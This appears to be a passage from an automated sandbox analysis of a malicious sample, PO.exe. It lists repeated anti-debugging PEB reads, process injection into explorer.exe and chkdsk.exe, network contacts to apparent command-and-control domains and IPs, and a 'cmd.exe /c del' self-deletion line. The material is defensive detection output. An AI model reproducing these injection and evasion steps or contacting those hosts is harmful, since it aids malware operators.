          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A03A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A74257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A98DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A23D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A63540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A07D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A28EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A18E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 199.247.6.20 80
          Source: C:\Windows\explorer.exeDomain query: www.ayescarrental.com
          Source: C:\Windows\explorer.exeDomain query: www.riceandginger.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.122 80
          Source: C:\Windows\explorer.exeDomain query: www.deerokoj.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Users\user\Desktop\PO.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
